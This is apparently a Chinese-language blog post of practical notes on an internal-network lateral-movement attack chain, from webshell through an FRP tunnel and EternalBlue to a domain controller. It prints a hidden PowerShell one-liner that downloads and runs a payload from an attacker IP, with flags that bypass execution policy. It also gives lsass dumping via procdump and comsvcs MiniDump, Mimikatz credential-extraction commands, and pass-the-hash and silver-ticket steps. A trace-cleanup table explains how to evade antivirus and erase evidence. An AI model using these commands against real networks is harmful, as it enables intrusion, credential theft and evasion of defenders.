内网横向移动全套实操重点知识总结

一、整体攻击链路

蚁剑Webshell → MSF反弹会话 → FRP反向隧道打通内网 → MS17-010永恒之蓝拿下内网Win7(SYSTEM权限)→ Procdump导出lsass内存dump → 本地Mimikatz提取账号Hash → PTH/PTT白银票据拿下域控DC 核心逻辑:Web服务器双网卡作为跳板,FRP隧道解决攻击机无法直连内网网段问题

二、无文件反弹(蚁剑→MSF,规避exe查杀)

  1. 载荷格式

    • psh-reflection:PowerShell反射载荷,纯文本无PE头,内存执行不落地

    • 64位目标必须匹配载荷:windows/x64/meterpreter/reverse_tcp

  2. 执行命令核心参数

    复制代码
    powershell -nop -w hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://攻击机IP:端口/payload.ps1')"
    • -nop:跳过配置文件;-w hidden:隐藏黑窗口

    • -exec bypass:绕过系统PowerShell执行策略限制

    • IEX+DownloadString:内存下载执行,不写入磁盘

  3. 配套环境 Kali开启Python简易HTTP服务分发脚本:python3 -m http.server 8080

三、FRP反向隧道(内网互通核心)

1. 作用

攻击机无法访问内网3.0网段,Web跳板双网卡可通内外网;Web主动连接Kali FRP服务端,在Kali本地开放SOCKS5代理,所有扫描/攻击流量走隧道中转。

2. 部署流程

  1. Kali启动frps服务端,监听绑定端口7000

  2. Web服务器上传frpc客户端+配置,后台持续运行建立隧道

  3. Kali配置proxychains4代理127.0.0.1:1080

  4. 扫描、MSF、impacket工具全部加proxychains前缀走代理

3. 两种载荷选择(内网攻击区分)

  • 内网靶机可直连攻击机:reverse_tcp反向载荷

  • 内网隔离无法外联:bind_tcp绑定端口载荷(攻击机通过隧道主动连接)

四、MS17-010永恒之蓝利用要点

  1. 前置条件:目标445端口开放、未打MS17-010补丁(Win7经典漏洞)

  2. 扫描工具:proxychains + nmap/msf smb_ms17_010扫描模块

  3. 利用配置:匹配系统架构x64载荷,开启自动校验系统与架构

  4. 权限收益:成功直接获取NT AUTHORITY\SYSTEM最高权限

五、凭据抓取(Procdump + 本地Mimikatz,规避杀软)

1. 方案优势

不在目标运行Mimikatz(极易被杀),仅导出lsass内存dump文件,回传到攻击机本地解析,痕迹少、拦截概率低。

2. 操作步骤

  1. Meterpreter查询lsass.exe PID

  2. 两种dump方式:

    • 工具:procdump64.exe -ma完整导出内存

    • 系统原生:rundll32 comsvcs.dll MiniDump无第三方工具

  3. dump文件下载至Kali后,目标机器立即删除文件清理痕迹

3. Mimikatz解析关键命令

复制代码
sekurlsa::minidump lsass.dmp   # 加载内存转储文件
sekurlsa::logonpasswords       # 提取明文密码、LM/NTLM Hash
  • 64位dump必须使用64位Mimikatz,否则读取不出凭据

  • 核心产出:域SID、管理员NTLM Hash、krbtgt账号Hash

六、域控渗透两种核心手段

1. Pass-The-Hash(PTH 哈希传递,推荐)

使用impacket工具套件,通过FRP代理直接携带NTLM Hash登录DC,无需票据:

2. Silver Ticket白银票据(PTT票据注入)

  1. 生成票据:使用域管理员Hash伪造指定服务(CIFS文件共享)票据

  2. 上传票据至靶机,Mimikatz执行kerberos::ptt注入内存

  3. 验证:klist查看票据,直接访问DC共享目录

  4. 对比黄金票据:白银票据仅针对单一服务,隐蔽性更强,但无法全域通用

七、无痕化核心规范

操作 是否落地文件 清理方式
PowerShell反弹 否(内存执行) 无痕迹
FRP客户端 临时文件 渗透结束删除exe
lsass dump 短期落地 下载后立刻删除
Mimikatz/票据 临时上传 注入完成马上删除

八、高频故障排查核心点

  1. FRP不通:检查Kali防火墙放行绑定端口、跳板能否ping通攻击机

  2. 永恒之蓝失败:确认445开放、无补丁、载荷架构匹配

  3. dump无数据:必须SYSTEM权限、procdump与系统位数一致、dump文件完整(几百MB)

  4. PTT无法访问DC:域名/SID/Hash复制无误、klist验证票据存在

  5. MSF反弹失效:端口/IP与载荷完全一致、防火墙放行、架构匹配

相关推荐
IT小白杨1 小时前
当MCP遇上指纹浏览器:AI自然语言驱动隔离环境的实践思路
人工智能·经验分享·selenium·安全·业界资讯·指纹浏览器
我命由我123452 小时前
人脸识别 - 人脸识别选帧
java·人工智能·python·算法·安全·java-ee·人脸识别
一只鹿鹿鹿2 小时前
数据资产管理解决方案(Word文件)
大数据·数据库·安全·web安全·系统安全
2401_894915532 小时前
Geo 优化源码部署实战:环境配置、参数调优完整指南
运维·服务器·数据库·tcp/ip·安全
肠畔码农2 小时前
Redis 主从复制内核深潜:从物理模型到全量增量同步的本质
网络·redis·php
CDN3603 小时前
360CDN发布HTTP/3(QUIC)弱网加速方案:实测首屏提速40%,彻底终结移动端接口超时与频繁断连
网络·网络协议·http
随风而飘1864 小时前
安立(Anritsu)MT8820C无线综合测试仪(手机综测仪)
网络·功能测试·测试工具·5g·智能手机
愚公搬代码4 小时前
【愚公系列】《Web应用安全》010-Repeater模块的使用
前端·安全
SWAGGY..4 小时前
【C++ 初阶】:(12)深入理解C++ stack:容器适配器、底层容器与算法实战
网络·网络协议·rpc
嵌入式阿蔡4 小时前
项目实战 02:智能家居环境网关——ESP32 做 BLE 中心 + 本地联动
网络·单片机·嵌入式硬件·esp32·智能家居·嵌入式实时数据库